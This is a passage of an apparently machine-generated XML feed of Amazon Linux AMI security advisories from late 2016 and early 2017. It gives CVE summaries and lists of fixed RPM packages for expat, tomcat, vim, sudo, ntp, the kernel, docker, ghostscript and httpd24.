status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-775</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-775: medium priority package update for expat</title><issued date="2016-12-15 00:38:00" /><updated date="2016-12-15 23:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0718:
An out-of-bounds read flaw was found in the way Expat processed certain input. A remote attacker could send specially crafted XML that, when parsed by an application using the Expat library, would cause that application to crash or, possibly, execute arbitrary code with the permission of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0718" title="" id="CVE-2016-0718" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:2824.html" title="" id="RHSA-2016:2824" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="10.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-10.21.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="10.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-10.21.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="10.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-10.21.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="10.21.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-10.21.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="10.21.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-10.21.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="10.21.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-10.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-776</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-776: important priority package update for tomcat6</title><issued date="2016-12-15 00:41:00" /><updated date="2016-12-15 23:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8735:
1397485:
CVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener
CVE-2016-6816:
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735" title="" id="CVE-2016-8735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-admin-webapps" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.48" release="1.8.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat6-6.0.48-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-777</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-777: important priority package update for tomcat7</title><issued date="2016-12-15 00:48:00" /><updated date="2016-12-15 23:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8735:
1397485:
CVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener
CVE-2016-6816:
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735" title="" id="CVE-2016-8735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" 
version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.73-1.23.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-778</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-778: important priority package update for tomcat8</title><issued date="2016-12-15 00:50:00" /><updated date="2016-12-15 23:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8735:
1397485:
CVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener
CVE-2016-6816:
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735" title="" id="CVE-2016-8735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-el-3.0-api" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-jsp-2.3-api" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.39-1.67.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-779</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-779: important priority package update for vim</title><issued date="2016-12-19 16:30:00" /><updated date="2016-12-19 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1248:
A vulnerability was found in vim in how certain modeline options were treated. An attacker could craft a file that, when opened in vim with modelines enabled, could execute arbitrary commands with the privileges of the user running vim.
1398227:
CVE-2016-1248 vim: Lack of validation of values for few options results in code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248" title="" id="CVE-2016-1248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-filesystem" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-filesystem-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0134" release="1.43.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-common-8.0.0134-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-780</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-780: medium priority package update for sudo</title><issued date="2017-01-04 17:00:00" /><updated date="2017-01-04 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7076:
It was discovered that the sudo noexec restriction could have been bypassed if an application run via sudo executed the wordexp() C library function with a user-supplied argument. A local user permitted to run such an application via sudo with the noexec restriction could possibly use this flaw to execute arbitrary commands with elevated privileges.
1384982:
CVE-2016-7076 sudo: noexec bypass via wordexp()
CVE-2016-7032:
It was discovered that the sudo noexec restriction could have been bypassed if an application run via sudo executed the system() or popen() C library functions with a user-supplied argument. A local user permitted to run such an application via sudo with the noexec restriction could use this flaw to execute arbitrary commands with elevated privileges.
1372830:
CVE-2016-7032 sudo: noexec bypass via system() and popen()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7032" title="" id="CVE-2016-7032" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7076" title="" id="CVE-2016-7076" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-25.23.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-25.23.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-25.23.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-25.23.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-25.23.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="25.23.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-25.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-781</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-781: medium priority package update for ntp</title><issued date="2017-01-04 17:00:00" /><updated date="2017-01-04 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9311:
1398350:
CVE-2016-9311 ntp: Null pointer dereference when trap service is enabled
CVE-2016-9310:
1397319:
CVE-2016-9310 ntp: Mode 6 unauthenticated trap information disclosure and DDoS vector
CVE-2016-7433:
1397347:
CVE-2016-7433 ntp: Broken initial sync calculations regression
CVE-2016-7429:
1397341:
CVE-2016-7429 ntp: Attack on interface selection
CVE-2016-7426:
1397345:
CVE-2016-7426 ntp: Client rate limiting and server responses
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7426" title="" id="CVE-2016-7426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7429" title="" id="CVE-2016-7429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7433" title="" id="CVE-2016-7433" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9310" title="" id="CVE-2016-9310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9311" title="" id="CVE-2016-9311" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-perl" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-43.33.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-43.33.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-43.33.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-43.33.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-43.33.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-43.33.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="43.33.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-43.33.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="43.33.amzn1" epoch="0" 
arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-43.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-782</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-782: medium priority package update for kernel</title><issued date="2017-01-04 17:00:00" /><updated date="2017-02-22 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9793:
The sock_setsockopt function in net/core/sock.c in the Linux kernel before 4.8.14 mishandles negative values of sk_sndbuf and sk_rcvbuf, which allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact by leveraging the CAP_NET_ADMIN capability for a crafted setsockopt system call with the (1) SO_SNDBUFFORCE or (2) SO_RCVBUFFORCE option.
1402013:
CVE-2016-9793 kernel: Signed overflow for SO_{SND|RCV}BUFFORCE
CVE-2016-9576:
The blk_rq_map_user_iov function in block/blk-map.c in the Linux kernel before 4.8.14 does not properly restrict the type of iterator, which allows local users to read or write to arbitrary kernel memory locations or cause a denial of service (use-after-free) by leveraging access to a /dev/sg device.
1403145:
CVE-2016-9576 kernel: Use after free in SCSI generic device interface
CVE-2016-8650:
A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key.
1395187:
CVE-2016-8650 kernel: Null pointer dereference via keyctl
CVE-2016-8399:
A flaw was found in the Linux networking subsystem where a local attacker with CAP_NET_ADMIN capabilities could cause an out-of-bounds read by creating a smaller-than-expected ICMP header and sending it to its destination via sendto().
1403833:
CVE-2016-8399 kernel: net: Out of bounds stack read in memcpy_fromiovec
CVE-2016-10147:
Algorithms not compatible with mcryptd could be spawned by mcryptd with a direct crypto_alloc_tfm invocation using a &quot;mcryptd(alg)&quot; name construct. This causes mcryptd to crash the kernel if an arbitrary &quot;alg&quot; is incompatible and not intended to be used with mcryptd.
1404200:
CVE-2016-10147 kernel: Kernel crash by spawning mcrypt(alg) with incompatible algorithm
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10147" title="" id="CVE-2016-10147" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8399" title="" id="CVE-2016-8399" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8650" title="" id="CVE-2016-8650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9576" title="" id="CVE-2016-9576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9793" title="" id="CVE-2016-9793" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" 
version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.39" 
release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.39" release="34.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.39-34.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.39" release="34.54.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.39-34.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-783</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-783: important priority package update for docker</title><issued date="2017-01-10 18:00:00" /><updated date="2017-01-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9962:
It was discovered that runC allowed additional container processes via `runc exec` to be ptraced by the pid 1 of the container. This allows the main processes of the container, if running as root, to gain access to file descriptors of these new processes during the initialization, which can lead to container escapes or modification of runC state before the process is fully placed inside the container.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9962" title="" id="CVE-2016-9962" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="1.12.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.12.6-1.17.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.12.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/docker-devel-1.12.6-1.17.amzn1.noarch.rpm</filename></package><package name="docker-debuginfo" version="1.12.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-1.12.6-1.17.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.12.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/docker-pkg-devel-1.12.6-1.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-784</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-784: medium priority package update for ghostscript</title><issued date="2017-01-10 18:00:00" /><updated date="2017-01-10 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8602:
It was found that ghostscript did not sufficiently check the validity of parameters given to the .sethalftone5 function. A specially crafted postscript document could cause a crash, or execute arbitrary code in the context of the gs process.
1383940:
CVE-2016-8602 ghostscript: check for sufficient params in .sethalftone5
CVE-2016-7979:
It was found that the ghostscript function .initialize_dsc_parser did not validate its parameter before using it, allowing a type confusion flaw. A specially crafted postscript document could cause a crash or code execution in the context of the gs process.
1382305:
CVE-2016-7979 ghostscript: Type confusion in .initialize_dsc_parser allows remote code execution
CVE-2016-7977:
It was found that the ghostscript function .libfile did not honor the -dSAFER option, usually used when processing untrusted documents, leading to information disclosure. A specially crafted postscript document could, in the context of the gs process, retrieve file content on the target machine.
1380415:
CVE-2016-7977 ghostscript: .libfile does not honor -dSAFER
CVE-2013-5653:
It was found that the ghostscript functions getenv and filenameforall did not honor the -dSAFER option, usually used when processing untrusted documents, leading to information disclosure. A specially crafted postscript document could read environment variables and list directories, respectively, on the target.
1380327:
CVE-2013-5653 ghostscript: getenv and filenameforall ignore -dSAFER
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5653" title="" id="CVE-2013-5653" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7977" title="" id="CVE-2016-7977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7979" title="" id="CVE-2016-7979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8602" title="" id="CVE-2016-8602" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="21.1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-21.1.24.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="21.1.24.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-21.1.24.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="21.1.24.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-21.1.24.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="21.1.24.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-21.1.24.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="21.1.24.amzn1" epoch="0" 
arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-21.1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-785</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-785: medium priority package update for httpd24</title><issued date="2017-01-19 16:30:00" /><updated date="2017-01-19 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8743:
1406822:
